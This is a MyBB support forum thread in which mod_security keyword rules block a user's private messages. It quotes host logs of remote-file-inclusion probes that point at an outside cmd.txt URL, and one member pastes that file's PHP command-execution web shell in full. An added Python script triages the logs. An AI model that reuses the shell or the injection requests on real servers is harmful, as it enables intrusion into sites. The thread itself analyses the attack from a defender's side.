MyBB Community Forums

Full Version: User being directed to private.php
He also runs no anti-virus btw..
To me, it sounds like a problem related to mod_security, which I've just noticed is installed on your server.

Part of what mod_security does is check incoming variables from pages for malicious content/keywords and deny access to pages. However, the problem with this is that there are lots of perfectly valid uses for those keywords and some people may have a perfectly legitimate use for them (phrases such as passwd, wget, rcp etc.).

Can you follow the instructions in this thread: http://community.mybboard.net/showthread.php?tid=7592 to disable mod_security, and see if he has any problems then?
I'm on the phone with my host right now actually :)
I had to submit a ticket because this will go deeper past the phone techs' abilities. They're usually fairly fast. Thanks for the fast responses Chris. Not sure how long it will be so I'll post the results when I get them and let you know.

I would have done that, but I know it's against my TOS to make any changes to the server security.. I'm a rule follower :P So I went the safe route.
Also make sure it's not a username problem. I had a problem on my TVG site with certain member username characters. See if he can PM anyone else.
Well, here we go :D

Ok Chris, not been tested but I think when my user comes back on it will work. Here's what my host said. Also, after you move this post, can you please answer what the tech is requesting as an alternate to the mod_security function. And can you also tell me what is so suspicious about those posts that would concern them. I have listed the reasons why mod_security has kicked in, in the response from my host. And again, I will post my user's response when he appears to verify this has worked for him.. And again, thank you Chris

As far as your issue is concerned, I have disabled mod_security for your forum. The main issue with your site was mod_sec blocking some suspicious posts towards your site. Such examples are:

---
[Sat Sep 1 23:02:12 2007] [error] [client 207.96.170.106] mod_security: Access denied with code 403. Pattern match "select.+from" at POST_PAYLOAD [hostname "www.xxx.com"] [uri "/forum/private.php"]
[Sat Sep 1 23:03:29 2007] [error] [client 207.96.170.106] mod_security: Access denied with code 403. Pattern match "select.+from" at POST_PAYLOAD [hostname "www.xxx.com"] [uri "/forum/private.php"]
[Sat Sep 1 23:05:14 2007] [error] [client 207.96.170.106] mod_security: Access denied with code 403. Pattern match "select.+from" at POST_PAYLOAD [hostname "www.xxx.com"] [uri "/forum/private.php"]
[Sat Sep 1 23:06:14 2007] [error] [client 207.96.170.106] mod_security: Access denied with code 403. Pattern match "select.+from" at POST_PAYLOAD [hostname "www.xxx.com"] [uri "/forum/private.php"]
[Sat Sep 1 23:10:19 2007] [error] [client 207.96.170.106] mod_security: Access denied with code 403. Pattern match "select.+from" at POST_PAYLOAD [hostname "www.xxx.com"] [uri "/forum/private.php"]
[Sat Sep 1 23:11:34 2007] [error] [client 207.96.170.106] mod_security: Access denied with code 403. Pattern match "select.+from" at POST_PAYLOAD [hostname "www.xxx.com"] [uri "/forum/private.php"]
[Sat Sep 1 23:12:59 2007] [error] [client 207.96.170.106] mod_security: Access denied with code 403. Pattern match "select.+from" at POST_PAYLOAD [hostname "www.xxx.com"] [uri "/forum/newreply.php"]
[Mon Sep 3 23:23:19 2007] [error] [client 74.200.206.162] mod_security: Access denied with code 403. Pattern match "/(cmd|command)\\\\.(gif|jpg|txt|bmp)\\\\?" at THE_REQUEST [hostname "www.xxx.com"] [uri "/forum/printthread.php?tid=534/includes/poll.php?GlobalSettings[templatesDirectory]=http://estballet.ee/media/cmd.txt?"]
[Mon Sep 3 23:23:19 2007] [error] [client 74.200.206.162] mod_security: Access denied with code 403. Pattern match "/(cmd|command)\\\\.(gif|jpg|txt|bmp)\\\\?" at THE_REQUEST [hostname "www.xxx.com"] [uri "/includes/poll.php?GlobalSettings[templatesDirectory]=http://estballet.ee/media/cmd.txt?"]
[Mon Sep 3 23:23:19 2007] [error] [client 74.200.206.162] mod_security: Access denied with code 403. Pattern match "/(cmd|command)\\\\.(gif|jpg|txt|bmp)\\\\?" at THE_REQUEST [hostname "www.xxx.com"] [uri "/forum/includes/poll.php?GlobalSettings[templatesDirectory]=http://estballet.ee/media/cmd.txt?"]
[Mon Sep 3 23:23:41 2007] [error] [client 74.200.206.162] mod_security: Access denied with code 403. Pattern match "/(cmd|command)\\\\.(gif|jpg|txt|bmp)\\\\?" at THE_REQUEST [hostname "www.xxx.com"] [uri "/forum/showthread.php?tid=534&pid=3751/includes/poll.php?GlobalSettings[templatesDirectory]=http://estballet.ee/media/cmd.txt?"]
[Mon Sep 3 23:24:36 2007] [error] [client 74.200.206.162] mod_security: Access denied with code 403. Pattern match "/(cmd|command)\\\\.(gif|jpg|txt|bmp)\\\\?" at THE_REQUEST [hostname "www.xxx.com"] [uri "/forum/printthread.php?tid=534/includes/poll.php?GlobalSettings[templatesDirectory]=http://estballet.ee/media/cmd.txt?"]
[Mon Sep 3 23:24:37 2007] [error] [client 74.200.206.162] mod_security: Access denied with code 403. Pattern match "/(cmd|command)\\\\.(gif|jpg|txt|bmp)\\\\?" at THE_REQUEST [hostname "www.xxx.com"] [uri "/includes/poll.php?GlobalSettings[templatesDirectory]=http://estballet.ee/media/cmd.txt?"]
[Mon Sep 3 23:24:37 2007] [error] [client 74.200.206.162] mod_security: Access denied with code 403. Pattern match "/(cmd|command)\\\\.(gif|jpg|txt|bmp)\\\\?" at THE_REQUEST [hostname "www.xxx.com"] [uri "/forum/includes/poll.php?GlobalSettings[templatesDirectory]=http://estballet.ee/media/cmd.txt?"]
[Mon Sep 3 23:24:53 2007] [error] [client 74.200.206.162] mod_security: Access denied with code 403. Pattern match "/(cmd|command)\\\\.(gif|jpg|txt|bmp)\\\\?" at THE_REQUEST [hostname "www.xxx.com"] [uri "/forum/showthread.php?tid=534&pid=3751/includes/poll.php?GlobalSettings[templatesDirectory]=http://estballet.ee/media/cmd.txt?"]
[Tue Sep 4 06:26:20 2007] [error] [client 64.124.85.76] mod_security: Access denied with code 403. Pattern match "BecomeBot" at HEADER("USER-AGENT") [hostname "www.xxx.com"] [uri "/robots.txt"]
[Tue Sep 4 06:28:21 2007] [error] [client 64.124.85.76] mod_security: Access denied with code 403. Pattern match "BecomeBot" at HEADER("USER-AGENT") [hostname "www.xxx.com"] [uri "/forum/myps.php?action=donate&username=mickzilla"]
[Tue Sep 4 07:49:00 2007] [error] [client 64.124.85.79] mod_security: Access denied with code 403. Pattern match "BecomeBot" at HEADER("USER-AGENT") [hostname "www.xxx.com"] [uri "/robots.txt"]
[Tue Sep 4 07:51:00 2007] [error] [client 64.124.85.79] mod_security: Access denied with code 403. Pattern match "BecomeBot" at HEADER("USER-AGENT") [hostname "www.xxx.com"] [uri "/forum/archive/index.php/thread-643.html"]
[Tue Sep 4 08:46:24 2007] [error] [client 64.124.85.76] mod_security: Access denied with code 403. Pattern match "BecomeBot" at HEADER("USER-AGENT") [hostname "www.xxx.com"] [uri "/robots.txt"]
[Tue Sep 4 08:48:31 2007] [error] [client 64.124.85.76] mod_security: Access denied with code 403. Pattern match "BecomeBot" at HEADER("USER-AGENT") [hostname "www.xxx.com"] [uri "/forum/attachment.php?aid=525"]
[Tue Sep 4 09:40:29 2007] [error] [client 216.77.62.44] mod_security: Access denied with code 403. Error processing request body: Multipart: final boundary missing [hostname "www.xxx.com"] [uri "/forum/editpost.php"]

---

Just to give you an idea about what we were blocking towards your site. The rules are not foolproof, so turning them off for a client is not a violation of our TOS. However, I would advise you contact your vendor, make sure your scripts are up to date, and possibly ask them if they have any mod_sec rulesets which they recommend for their product. If they have any, you should use them.

Please test it out now and let me know if you are having any issues.

Regards,
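The host's log excerpt mixes three different kinds of event: a keyword rule ("select.+from") firing on the body of ordinary forum posts from one client, remote-file-inclusion probes that hand a full URL to a query parameter, and a blocked crawler user agent. Telling those apart is the first thing a forum admin should do before deciding whether to switch mod_security off entirely. The following Python script is an added example, not code from the thread, MyBB or the host: it parses lines in the mod_security 1.x audit format shown above and sorts them into those classes. The sample lines are constructed in that same format with placeholder hostnames and documentation-range IPs, and the classification heuristic is this example's own, not a mod_security feature.

```python
import re
from collections import Counter

# Constructed sample lines in the mod_security 1.x "Access denied" format seen
# in the host's reply. Hostnames and IPs are placeholders, not real servers.
SAMPLE_LOG = r"""
[Sat Sep 1 23:02:12 2007] [error] [client 203.0.113.10] mod_security: Access denied with code 403. Pattern match "select.+from" at POST_PAYLOAD [hostname "forum.example"] [uri "/forum/private.php"]
[Sat Sep 1 23:12:59 2007] [error] [client 203.0.113.10] mod_security: Access denied with code 403. Pattern match "select.+from" at POST_PAYLOAD [hostname "forum.example"] [uri "/forum/newreply.php"]
[Mon Sep 3 23:23:19 2007] [error] [client 198.51.100.7] mod_security: Access denied with code 403. Pattern match "/(cmd|command)\\\\.(gif|jpg|txt|bmp)\\\\?" at THE_REQUEST [hostname "forum.example"] [uri "/forum/includes/poll.php?GlobalSettings[templatesDirectory]=http://attacker.invalid/cmd.txt?"]
[Tue Sep 4 06:26:20 2007] [error] [client 192.0.2.33] mod_security: Access denied with code 403. Pattern match "BecomeBot" at HEADER("USER-AGENT") [hostname "forum.example"] [uri "/robots.txt"]
[Tue Sep 4 09:40:29 2007] [error] [client 203.0.113.10] mod_security: Access denied with code 403. Error processing request body: Multipart: final boundary missing [hostname "forum.example"] [uri "/forum/editpost.php"]
"""

# One record per line: timestamp, client IP, response code, then either a
# "Pattern match" (rule text + where it matched) or a request-body error,
# followed by the hostname and URI fields.
LINE_RE = re.compile(
    r'^\[(?P<time>[^\]]+)\] \[error\] \[client (?P<client>[\d.]+)\] mod_security: '
    r'Access denied with code (?P<code>\d+)\. '
    r'(?:Pattern match "(?P<pattern>.*?)" at (?P<location>[A-Z_]+(?:\("[^"]*"\))?)'
    r'|(?P<error>Error processing request body: .*?)) '
    r'\[hostname "(?P<host>[^"]*)"\] \[uri "(?P<uri>[^"]*)"\]$'
)


def classify(rec):
    """Triage heuristic (this example's own assumption): which kind of event
    is this record? The goal is to separate one legitimate user's blocked
    forum posts from unrelated automated probes."""
    uri = rec["uri"]
    location = rec.get("location") or ""
    if rec.get("error"):
        return "request-body-error"
    query = uri.split("?", 1)[-1] if "?" in uri else ""
    if "://" in query:
        # A full URL passed as a query parameter value: a remote-file-inclusion probe.
        return "rfi-probe"
    if location.startswith("HEADER"):
        # Rule matched on a request header (here the User-Agent): blocked crawler.
        return "blocked-user-agent"
    if location == "POST_PAYLOAD" and uri.endswith(".php"):
        # Keyword rule fired on the body of a normal forum form submission;
        # for a discussion forum this is the usual false-positive shape.
        return "keyword-in-post-body"
    return "other"


def parse_log(text):
    """Parse every recognised line into a dict and tag it with its class."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["class"] = classify(rec)
            records.append(rec)
    return records


def summarize(records):
    """Count events per (class, client). Many keyword hits from a single client
    against forum scripts point at one user's posts being blocked; scattered
    probes from other clients are background noise the rules handled."""
    return dict(Counter((r["class"], r["client"]) for r in records))


def false_positive_candidates(records):
    """Return (pattern, uri) pairs a rule author would review for exceptions:
    keyword rules that fired on post bodies of the forum's own scripts."""
    return sorted({(r["pattern"], r["uri"]) for r in records
                   if r["class"] == "keyword-in-post-body"})


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for (cls, client), n in sorted(summarize(recs).items()):
        print(f"{cls:22s} {client:15s} {n}")
    for pattern, uri in false_positive_candidates(recs):
        print(f"review rule {pattern!r} on {uri}")
```

Running the script on a real mod_security error log instead of the constructed sample (read the file and pass its contents to `parse_log`) gives the per-client breakdown the host's reply only hinted at: which rule and which forum script are responsible for the blocked private messages, and which entries are unrelated scanning.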
Just for curiosity purposes here: on September 3rd, it looks like someone was trying to hack you.

http://estballet.ee/media/cmd.txt

<?php
echo "Mic22";
$dir = @getcwd();
$ker = @php_uname();
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir); 
if ($free === FALSE) {$free = 0;} 
if ($free < 0) {$free = 0;} 
echo "Free:".view_size($free)."<br>"; 
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size) 
{ 
if (!is_numeric($size)) {return FALSE;} 
else 
{ 
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 
else {$size = $size . " B";} 
return $size; 
}
} 
exit;

mod_security did what it did best and blocked that script (even though it wouldn't have worked anyway).

I suspect you're having the same problem with mod_security with private.php and the others. Since it's not against your host's TOS, I suggest you put that script up that Chris pointed you towards above.
That hack attempt would be coming from Estonia, is that correct? .ee is Estonia.

If they already disabled mod_security, then why would I need to add the script? Am I missing something else? Not a hard coder as you know Tikitiki.

And thank you for finding that hack attempt. :)

I'm also curious, if mod_security couldn't have stopped this, then what did?
When I checked, I found this. This is the code I believe they put in my forum .htaccess:

<IfModule mod_security.c>
        SecFilterEngine Off
</IfModule>

hemi Wrote: That hack attempt would be coming from Estonia, is that correct? .ee is Estonia.

If they already disabled mod_security, then why would I need to add the script? Am I missing something else? Not a hard coder as you know Tikitiki.

And thank you for finding that hack attempt. :)

I'm also curious, if mod_security couldn't have stopped this, then what did?

The fact that none of the variables such as "GlobalSettings[templatesDirectory]" are present in MyBB, and the other variables that MyBB uses are secured.

These are automated bots which are doing this to your forum - you're not a specific target.